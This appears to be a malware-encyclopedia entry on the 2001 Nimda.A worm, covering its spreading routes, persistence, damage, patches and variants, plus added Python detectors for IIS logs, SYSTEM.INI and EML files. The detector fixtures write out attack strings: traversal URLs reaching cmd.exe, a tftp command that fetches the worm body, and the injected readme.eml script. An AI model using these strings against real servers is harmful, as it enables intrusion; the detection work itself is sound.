W32/Nimda.A@mm

• Detected by virus detection files published: 9/19/2001
• Virus characteristics first published: 9/19/2001
• Virus characteristics latest update: 8/29/2005
• Type: Backdoor, Virus, Worm
• Spreading mechanism: Email, Network, Webpage
• Overall risk: High
• Affected platforms: Microsoft Windows 95/98/98 SE/ME/NT 4/2000/XP/2003/Vista

This email virus uses several methods to spread itself:

  • It spreads via email from infected users. It sends itself to addresses harvested from HTML pages on the infected machine and from the user's mail inbox, using its own SMTP routine. The emails have no body text and either no Subject line or a random one. The attachment is named README.EXE.

  • It spreads via network shares with write access, and also opens shares on the drives of the machines it infects. The virus may copy many files to these remote machines, named after files found on the local machine but with *.EML and *.NWS extensions. These files are more or less identical and contain the exploit that installs the virus automatically when the file is viewed in Internet Explorer or in Outlook/Outlook Express.

  • In addition, the virus may infect EXE files (except WINZIP32.EXE). An infected file consists of the virus body first, with the original EXE appended as a resource at the end of the combined file.

  • It spreads to web servers running Microsoft Internet Information Server (IIS) through a number of security holes, most importantly the "Web Server Folder Traversal" vulnerability, which gives access to the web server's hard disk. The worm copies itself to the server as ADMIN.DLL and then activates it by requesting it over HTTP. The virus also looks for the backdoors left open by the NT/CodeRed.C worm.

  • It infects web pages (*.HTM, *.HTML, *.ASP) by appending a tiny JavaScript snippet. When the page is viewed, the script opens a browser window that references a file called README.EML. This EML file carries the "Incorrect MIME Header Can Cause IE to Execute E-mail Attachment" exploit, so the virus can be downloaded and executed on the user's machine without any prompt. Users may thus be infected simply by browsing the web, without noticing anything. Combined with the spreading to the web server, this makes a unique and dangerous spreading mechanism.
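
As an added illustration of what the IIS-side propagation described in the web-server bullet above looks like from the server's point of view (example code written for this page, not part of the original description or of any vendor tool), the following Python scans W3C-style IIS log lines for the request shapes such a worm produces: directory-traversal attempts that reach cmd.exe through an overlong UTF-8 separator (%c0%af is an overlong encoding of "/", the form the "Web Server Folder Traversal" flaw accepted) or through a double-encoded one (%255c, a related IIS decoding bug), requests for root.exe (the renamed cmd.exe that the CodeRed backdoor mentioned above leaves in the script directories; the page names the backdoor but not the file, so that detail comes from the worm's public analyses), and the retrieval of Admin.dll. The log lines are constructed for the example, and the tftp transfer in one of them is just one plausible way of copying the file over.

```python
import re
from urllib.parse import unquote, unquote_to_bytes

# Constructed W3C-style IIS log lines (date time c-ip cs-method cs-uri-stem cs-uri-query
# sc-status); not taken from a real server. 10.0.0.7 plays the infected host probing us.
SAMPLE_LOG = """\
2001-09-18 13:02:11 10.0.0.7 GET /scripts/root.exe /c+dir 200
2001-09-18 13:02:12 10.0.0.7 GET /MSADC/root.exe /c+dir 404
2001-09-18 13:02:13 10.0.0.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:02:14 10.0.0.7 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 13:02:15 10.0.0.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+tftp%20-i%2010.0.0.7%20GET%20Admin.dll%20c:%5cAdmin.dll 502
2001-09-18 13:02:16 10.0.0.7 GET /scripts/Admin.dll - 200
2001-09-18 13:02:17 10.0.0.9 GET /index.htm - 200
2001-09-18 13:02:18 10.0.0.9 GET /images/logo.gif - 200
"""

LOG_LINE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")


def decode_overlong_utf8(raw: bytes) -> str:
    """Turn bytes into text, folding two-byte overlong UTF-8 sequences (lead byte 0xC0
    or 0xC1) back into the ASCII character they encode: %c0%af is '/', %c1%9c is '\\'.
    A strict decoder rejects these, which is why a check on the encoded path misses them."""
    out = []
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))  # ASCII stays as-is; other bytes become Latin-1 placeholders
            i += 1
    return "".join(out)


def canonical_path(uri_stem: str) -> str:
    """Normalise a request path the way the attacker hopes the server will: percent-decode,
    fold overlong UTF-8, percent-decode once more (catches %255c double encoding), then
    treat backslash as a separator and lower-case for comparison."""
    text = decode_overlong_utf8(unquote_to_bytes(uri_stem))
    text = unquote(text)
    return text.replace("\\", "/").lower()


def classify_request(uri_stem: str, query: str) -> list:
    """Tag one request with the propagation indicators it matches (empty list if none)."""
    segments = canonical_path(uri_stem).split("/")
    last = segments[-1]
    tags = []
    if ".." in segments:
        tags.append("traversal")          # path escapes the virtual directory
    if last == "cmd.exe":
        tags.append("cmd.exe")            # command shell reached through the web server
    if last == "root.exe":
        tags.append("codered-backdoor")   # renamed cmd.exe left by the CodeRed backdoor
    if last == "admin.dll":
        tags.append("admin.dll")          # worm body requested, which activates it
    if "admin.dll" in unquote(query).lower():
        tags.append("admin.dll-transfer") # shell command that pulls the worm body over
    return tags


def scan_log(text: str) -> list:
    """Return one record per suspicious log line."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        match = LOG_LINE.match(line)
        if not match:
            continue
        _date, _time, ip, _method, stem, query, status = match.groups()
        tags = classify_request(stem, query)
        if tags:
            hits.append({"line": number, "ip": ip, "status": int(status),
                         "stem": stem, "tags": tags})
    return hits


def suspicious_clients(hits: list, threshold: int = 3) -> list:
    """Client addresses that produced at least `threshold` flagged requests."""
    counts = {}
    for hit in hits:
        counts[hit["ip"]] = counts.get(hit["ip"], 0) + 1
    return sorted(ip for ip, count in counts.items() if count >= threshold)


if __name__ == "__main__":
    flagged = scan_log(SAMPLE_LOG)
    for hit in flagged:
        print(f"line {hit['line']}: {hit['ip']} {hit['stem']} -> {', '.join(hit['tags'])}")
    print("probable worm sources:", suspicious_clients(flagged))
```

The point of canonical_path() is that the comparison runs on the decoded, separator-normalised path rather than on the raw URI: a rule that only looks for the literal string "../" never sees %c0%af or %255c, which is the same mistake the vulnerable server made. A non-200 status does not clear a line; the 404 on /MSADC/root.exe still shows a host probing for the backdoor.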

When the virus is first executed, it creates a number of copies of itself in the Windows TEMP directory. It then creates a hidden copy called LOAD.EXE in the Windows system directory and references it from SYSTEM.INI so that it is loaded at boot.

On Windows NT, the viral code runs inside EXPLORER.EXE's address space, injected with the Windows API CreateRemoteThread, so it does not show up as a separate process in the Task List. On Windows 9x and Me, the program achieves the same effect with the RegisterServiceProcess API, which hides it from the task list. These techniques were first seen in the backdoor trojans BackOrifice and BackOrifice 2000.
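
The SYSTEM.INI persistence described two paragraphs above is something an administrator can check offline, so here is an added example (written for this page; not the original description's material or any vendor tool) that parses the [boot] section and reports whatever has been chained onto the shell= line. The two INI excerpts are constructed; the infected one uses the shell= form commonly reported for Nimda.A ("explorer.exe load.exe -dontrunold"), while the page itself only says that SYSTEM.INI is made to point at LOAD.EXE, so the exact tokens are illustrative rather than taken from this page.

```python
# Constructed SYSTEM.INI excerpts, not files taken from a real machine. The infected
# form uses the shell= line commonly reported for Nimda.A; the page only says that
# SYSTEM.INI points at LOAD.EXE, so treat the exact tokens as illustrative.
INFECTED_SYSTEM_INI = """\
[boot]
shell=explorer.exe load.exe -dontrunold
drivers=mmsystem.dll

[386Enh]
device=*vmd
"""

CLEAN_SYSTEM_INI = """\
[boot]
shell=explorer.exe
drivers=mmsystem.dll
"""


def parse_ini(text: str) -> dict:
    """Minimal INI reader: {section: {key: value}} with section and key names lower-cased.
    Written by hand because SYSTEM.INI allows duplicate keys and bare lines that
    stricter parsers reject."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def shell_extras(text: str) -> list:
    """Programs and arguments chained onto the Windows shell line. Empty means the shell
    line is the stock 'explorer.exe'; anything else is launched at every boot."""
    boot = parse_ini(text).get("boot", {})
    tokens = boot.get("shell", "explorer.exe").split()
    if tokens and tokens[0].lower() == "explorer.exe":
        return tokens[1:]
    return tokens        # shell replaced outright: report the whole line


def check_system_ini(text: str) -> dict:
    """Summarise the boot-time persistence state of one SYSTEM.INI."""
    extras = shell_extras(text)
    return {
        "clean": not extras,
        "extras": extras,
        "load_exe": any(token.lower() == "load.exe" for token in extras),
    }


if __name__ == "__main__":
    for label, ini in (("infected", INFECTED_SYSTEM_INI), ("clean", CLEAN_SYSTEM_INI)):
        print(label, check_system_ini(ini))
```

The check deliberately reports any extra token, not just load.exe: a worm that renames its dropper still has to get itself onto that line, so the stock value "explorer.exe" on its own is the only state worth calling clean.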

Damage
The virus contains few intentionally damaging routines. However, it overwrites the files RICHED20.DLL and MMC.EXE with itself, and both are normal Windows components. RICHED20.DLL is used by several programs, such as Microsoft Word, to display Rich Text Format; by replacing it, the virus is invoked every time Word or another application that loads this file is started. MMC.EXE is the Microsoft Management Console and is normally located in the Windows system folder. Both files must be restored from the installation media.

Note for Web administrators
When the virus spreads to a web server it uses a number of different techniques, most importantly the "Web Server Folder Traversal" vulnerability. Administrators who run IIS should make certain they have applied the cumulative IIS patch available from Microsoft.

Information from:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-078.asp

Cumulative patch from:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-044.asp

Note for all users
When the virus spreads via email and from infected web servers, users may be infected without taking any action themselves. This is accomplished through a known security hole, "Incorrect MIME Header Can Cause IE to Execute E-mail Attachment".

Information and patch are available from:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-020.asp

The security hole is a known issue with Internet Explorer versions 5.01 and 5.5 without SP2. Users who have this configuration should apply the available patch.
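
As an added example (written for this page, not code from the original description or from any vendor tool) of the two checks a practitioner would want for the client-side path described in this note and in the web-page bullet earlier: the first walks an .EML message with Python's standard email package and flags any part whose declared Content-Type contradicts its filename or its content, which is the mismatch the "Incorrect MIME Header" hole turns into code execution; the second looks for the appended script that opens README.EML in web pages. The message and the pages are constructed for the example. The window.open("readme.eml", ...) form and the zero-size iframe pointing at the attachment by Content-ID follow the worm's public analyses, which the page only paraphrases, so treat those details as assumptions.

```python
import base64
import re
from email import message_from_string

# Constructed README.EML-style message, not a real worm sample: the attachment is declared
# as audio/x-wav but carries a (fake) executable whose first bytes are the "MZ" PE marker.
FAKE_PE = base64.b64encode(b"MZ\x90\x00" + b"\x00" * 60).decode()
SAMPLE_EML = f"""\
From: <nobody@example.invalid>
Subject:
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC"

--====_ABC
Content-Type: multipart/alternative; boundary="====_DEF"

--====_DEF
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<HTML><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0></iframe>
</BODY></HTML>

--====_DEF--

--====_ABC
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

{FAKE_PE}

--====_ABC--
"""

# Constructed web pages; index.htm and default.asp carry the appended window.open() snippet.
SAMPLE_PAGES = {
    "index.htm": "<html><body>Welcome</body></html>"
                 '<html><script language="JavaScript">window.open("readme.eml", null, '
                 '"resizable=no,top=6000,left=6000")</script></html>',
    "about.html": "<html><body><p>Nothing appended here</p></body></html>",
    "default.asp": "<% Response.Write(\"ok\") %><script>window.open('README.EML')</script>",
}

EXECUTABLE_EXT = (".exe", ".scr", ".dll", ".com", ".pif", ".bat")
INJECTED_SCRIPT = re.compile(
    r"""<script[^>]*>\s*window\.open\s*\(\s*["']?readme\.eml""", re.IGNORECASE)


def mime_mismatches(raw_eml: str) -> list:
    """Flag attachment parts whose declared Content-Type contradicts their name or content.
    Returns (declared_type, filename, reasons) per offending part."""
    findings = []
    for part in message_from_string(raw_eml).walk():
        if part.is_multipart():
            continue
        declared = part.get_content_type()
        name = (part.get_filename() or "").lower()   # falls back to the Content-Type name=
        body = part.get_payload(decode=True) or b""   # base64 / quoted-printable undone
        reasons = []
        if body[:2] == b"MZ" and not declared.startswith("application/"):
            reasons.append(f"PE image declared as {declared}")
        if name.endswith(EXECUTABLE_EXT) and not declared.startswith("application/"):
            reasons.append(f"executable name {name!r} declared as {declared}")
        if reasons:
            findings.append((declared, name, reasons))
    return findings


def injected_pages(pages: dict) -> list:
    """Names of pages that carry the appended readme.eml window.open() snippet."""
    return sorted(name for name, html in pages.items() if INJECTED_SCRIPT.search(html))


if __name__ == "__main__":
    for declared, name, reasons in mime_mismatches(SAMPLE_EML):
        print(f"{name or '(unnamed)'} as {declared}: " + "; ".join(reasons))
    print("injected pages:", injected_pages(SAMPLE_PAGES))
```

Checking the decoded bytes matters more than checking the filename: the hole was precisely that Internet Explorer trusted the Content-Type header over the attachment's name and content, so a gateway that repeats that trust learns nothing. The same mismatch test applies unchanged to the *.EML and *.NWS copies the worm drops on open shares.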
Variants
There are several variants of Nimda. Below is a listing of the variants and the names of the files each one uses or creates:

Nimda.A
README.EXE (the email attachment), MMC.EXE, LOAD.EXE, RICHED20.DLL, ADMIN.DLL

Nimda.B
PUTA!!.SCR (the email attachment), MMC.EXE, PUTA.SCR, RICHED20.DLL, ADMIN.DLL

Nimda.C
Like the A variant

Nimda.D
Like the A variant

Nimda.E
SAMPLE.EXE (the email attachment), CSRSS.EXE, LOAD.EXE, RICHED20.DLL, HTTPODBC.DLL

Nimda.F
PUTA!!.SCR (the email attachment), MMC.EXE, LOAD.EXE, RICHED20.DLL, ADMIN.DLL